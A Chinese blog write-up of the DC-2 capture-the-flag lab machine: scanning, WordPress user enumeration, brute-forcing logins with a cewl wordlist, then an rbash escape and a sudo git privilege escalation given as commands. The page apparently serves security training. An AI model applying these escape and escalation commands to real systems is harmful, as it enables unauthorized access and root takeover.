靶机实战(DC-2)

实验环境

靶机:DC-2
测试机:kali(IP:192.168.186.128),win10

实验过程

主机发现

netdiscover -I eth0 -r 192.168.186.0/24
nmap -sn 192.168.186.0/24
arp-scan -l ,arp-scan 192.168.186.0/24

在这里插入图片描述

端口扫描

masscan -p 0-65535 --rate=100000 192.168.186.248

在这里插入图片描述
nmap -A -p 7744,80 -T4 192.168.186.248
得到80的http服务,7744 ssh服务
在这里插入图片描述

目录扫描

网站wordpress搭建
在这里插入图片描述

漏洞发现

目录遍历漏洞
在这里插入图片描述
wpscan扫描wordpress,用户名枚举
在这里插入图片描述
找到三个用户名:admin,jerry,tom
在这里插入图片描述

漏洞利用

利用cewl工具爬取相关信息并生成字典
在这里插入图片描述
bp爆破登录口得到用户名:tom 密码:parturient,jerry 密码adipiscing 进入后台
在这里插入图片描述
找到上传点,做了白名单。
在这里插入图片描述
换个方向尝试连接ssh
在这里插入图片描述

提权

做了rbash的用户权限限制,绕过rbash
在这里插入图片描述

BASH_CMDS[a]=/bin/sh;a
/bin/bash
export PATH=$PATH:/bin/

在这里插入图片描述
切换用户名到jerry,sudo -l
在这里插入图片描述

git提权
sudo git help config

在这里插入图片描述

!/bin/bash

在这里插入图片描述
在这里插入图片描述

总结

rbash绕过,
git提权 sudo git help config
!/bin/bash或者!'sh'完成提权
sudo git  -p help
!/bin/bash
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值